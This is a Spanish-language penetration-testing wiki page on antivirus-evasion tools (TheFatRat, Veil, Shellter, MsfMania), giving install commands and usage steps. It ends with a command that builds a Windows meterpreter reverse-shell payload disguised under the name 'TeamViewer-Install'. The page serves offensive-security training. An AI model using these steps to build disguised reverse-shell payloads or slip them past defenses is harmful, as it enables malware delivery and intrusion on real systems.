🛡️Herramientas de Evasión

En esta página presento otras herramientas que pueden ser de utilidad a la hora de evadir antivirus y defensas.

TheFatRat

TheFatRat es una potente herramienta de generación de payloads y explotación diseñada para simplificar y automatizar la creación de malware y la realización de ataques en diversos sistemas. Aplica distintas técnicas para cifrar los payloads y así eludir los antivirus.

GitHub - screetsec/TheFatRat: Thefatrat a massive exploiting tool : Easy tool to generate backdoor and easy tool to post exploitation attack like browser attack and etc . This tool compiles a malware with popular payload and then the compiled malware can be execute on windows, android, mac . The malware that created with this tool also have an ability to bypass most AV software protection .GitHub

Veil Framework

Veil tiene como objetivo crear payloads que puedan evadir la detección de software antivirus y anti-malware. La herramienta utiliza técnicas de ofuscación de código para evitar la detección de software antivirus y anti-malware. También puede generar payloads para diferentes tipos de ataque, como Reverse Shell, Meterpreter y PowerShell.

Nota: Como lleva tiempo sin actualizarse, la mayoría de binarios que crea posiblemente sean detectados por los antivirus modernos.

GitHub - Veil-Framework/Veil: Veil 3.1.X (Check version info in Veil at runtime)GitHub

sudo apt install veil
sudo veil

Selecciona el tipo de payload (Evasion)
Elige el lenguaje (Python, C, etc.)
Configura el payload (reverse_tcp, etc.)
Genera el .exe

Shellter

Shellter utiliza la técnica de inyección de código en tiempo de ejecución para ocultar los payloads maliciosos dentro de archivos ejecutables legítimos. La herramienta tiene como objetivo evadir la detección de software antivirus y anti-malware mediante la modificación de la memoria del proceso en tiempo de ejecución. Esto permite a los payloads maliciosos ejecutarse sin ser detectados por el software antivirus y anti-malware.

Viene instalada por defecto en kali Linux

GitHub - ParrotSec/shellterGitHub

Instalación y uso

sudo apt-get update
sudo apt-get install wine
wget https://www.shellterproject.com/Downloads/Shellter/Latest/shellter.zip
unzip shellter.zip
cd shellter
wine shellter.exe

MSFMania

MsfMania es una herramienta de línea de comandos desarrollada en Python que está diseñada para eludir el software antivirus en Windows y Linux/Mac en el futuro.

Es poco conocida así que puede funcionar bien

GitHub - lepotekil/MsfMania: Python AV Evasion ToolsGitHub

Instalación y uso

git clone https://github.com/G1ft3dC0d3/MsfMania.git
cd MsfMania
python3 MsfMania.py -h

Ejemplo de payload para Windows

python3 MsFmania.py -a x64 -p windows/x64/meterpreter/reverse_tcp -lh 192.168.1.26 -lp 4443 -o TeamViewer-Install -it local --hash md5

AnteriorEvasión de Antivirus SiguienteActive Directory

Última actualización hace 8 meses

hashtagTheFatRat

hashtagVeil Framework

hashtagShellter

hashtagInstalación y uso

hashtagMSFMania

hashtagInstalación y uso

hashtagEjemplo de payload para Windows

TheFatRat

Veil Framework

Shellter

Instalación y uso

MSFMania

Instalación y uso

Ejemplo de payload para Windows